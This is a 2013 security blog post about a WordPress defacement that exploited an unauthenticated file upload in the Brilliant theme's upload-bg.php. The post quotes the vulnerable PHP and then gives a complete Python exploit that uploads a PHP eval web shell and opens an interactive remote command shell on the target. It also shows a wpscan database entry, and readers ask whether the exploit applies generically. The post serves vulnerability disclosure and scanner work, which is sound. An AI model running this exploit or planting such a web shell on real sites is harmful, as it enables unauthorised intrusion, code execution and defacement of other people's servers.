WordPress Themes Exploits are in action – wpscan

About five days ago a friend of mine called me telling that some group defaced a wordpress site  belongs to the company he owns.

After checking the logs, I found the attacker exploited a vulnerability in “Brilliant Theme”
a product from cmsmasters

The attacker was able to abuse a bug in a file called upload-bg.php within the following path: /wp-content/themes/brilliant/theme/functions that leads to upload malicious codes to the web-server.

<?php
 * @package WordPress
 * @subpackage Brilliant
 * @since Brilliant 1.0
 *
 * Background Image Uploader
 * Created by CMSMasters
 *
 */

require('../../../../../wp-load.php');

if ($_POST['url']){ $uploaddir = $_POST['url']; }

$first_filename = $_FILES['uploadfile']['name'];

$filename = md5($first_filename);

$ext = substr($first_filename, 1 + strrpos($first_filename, '.'));

$file = $uploaddir . basename($filename.'.'.$ext);

if (move_uploaded_file($_FILES['uploadfile']['tmp_name'], $file)){
        $thumb = imagecreatetruecolor(20, 20);

        if ($ext == 'png'){
                $image = imagecreatefrompng(get_template_directory_uri().'/images/bgs/'.$filename.'.'.$ext);
        } elseif ($ext == 'gif'){
                $image = imagecreatefromgif(get_template_directory_uri().'/images/bgs/'.$filename.'.'.$ext);
        } else {
                $image = imagecreatefromjpeg(get_template_directory_uri().'/images/bgs/'.$filename.'.'.$ext);
        }

        list($width, $height) = getimagesize(get_template_directory_uri().'/images/bgs/'.$filename.'.'.$ext);

        imagecopyresampled($thumb, $image, 0, 0, 0, 0, 20, 20, $width, $height);

        $filename_thumb = $filename.'_thumb';

        $file_thumb = $uploaddir . basename($filename_thumb.'.jpg');

        imagejpeg($thumb, $file_thumb, 100);

        echo basename($filename.'.'.$ext.','.$filename_thumb.'.jpg');
} else {
        echo 'error';
}
?>

As noticed, the code above doesn’t have any restrictions on the uploaded file or even require an authentication to upload it to the server !!
Here is the python code that demonstrates the upload vulnerability

#!/usr/bin/env python

import sys
import requests
import os

def shell_path(path="tmp", name="ruinedsec.php"):
    "write the malicious code on the attacker box"
    with open('/%s/%s' % (path, name), 'w') as shell:
        shell.write("<?php @eval($_GET['cmd']); ?>" + "\n")
    return "/%s/%s" % (path, name)

def send_shell(target):
    "send the malicious code to the target box"
    response = requests.post(target,
            files=dict(uploadfile=open(shell_path(), 'r')),
            data={'url': './', 'uploadfile': ''})
    return response.text.splitlines()[-1].split(',')[0]

def drop_shell(target):
    "dropping a system shell through eval function"
    choice = raw_input('\n[!] I can drop you a small shell (y/n): ')
    if choice == 'y':
        print "[+] You can kill the shell when ever you want 'type exit'\n"
        while True:
            command = raw_input('$shell: ')
            if command != 'exit':
                print requests.get("%s?cmd=system('%s');" % (target, requests.utils.quote(command))).text.rstrip()
            else:
                break
    else:
        return

def clean_house(shell):
    "remove the shell we created shell_path()"
    try:
        os.remove(shell)
    except OSError:
        print "[!] Something went wrong while deleting '%s', remove it manually" % shell

def main():
    full_shell_url = "/".join(sys.argv[1].split('/')[:-1]) + "/" + send_shell(sys.argv[1])
    print "\n[+] Successfully crafted the malicious code to %s" % shell_path()
    print "[+] Successfully wrote the malicious code on the target"
    print "[+] You can access the shell through %s" % full_shell_url
    drop_shell(full_shell_url)
    clean_house(shell_path())
    print "[+] Successfully Removed %s from our server" % shell_path()

if __name__ == '__main__':
    main()

After running the script, you should see something similar:
brilliant

Now its a good chance to contribute in some awesome project called wpscan
It’s pretty easy to get your exploit into wpscan DB, all what you need is including the vulnerability in data/theme_vulns.xml

  <theme name="brilliant">
    <vulnerability>
      <title>brilliant File Upload Vulnerability</title>
      <reference>https://ruinedsec.wordpress.com/2013/04/03/wordpress-themes-exploits-are-in-action-wpscan/</reference>
      <type>UPLOAD</type>
    </vulnerability>
  </theme>

After editing the file, now run wpscan against the target
wpscan

@xxDigiPxx mentioned the same exploit that affects “Clockstone Theme” HERE

This was: Ahmed Shawky @lnxg33k

Advertisements
This entry was posted in web-application and tagged , , , . Bookmark the permalink.

7 Responses to WordPress Themes Exploits are in action – wpscan

  1. Muhammad Waqar says:

    can you please share tutorial that how to add an exploit to wpscan.
    Thank you!

  2. Infosec84 says:

    Is the perl script complete somehow?

  3. beard says:

    Hello,
    The code in python can be used for all wordpress themes vuln ? Is generic ?

  4. beard says:

    I mean for arbitrary upload in wordpress themes

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s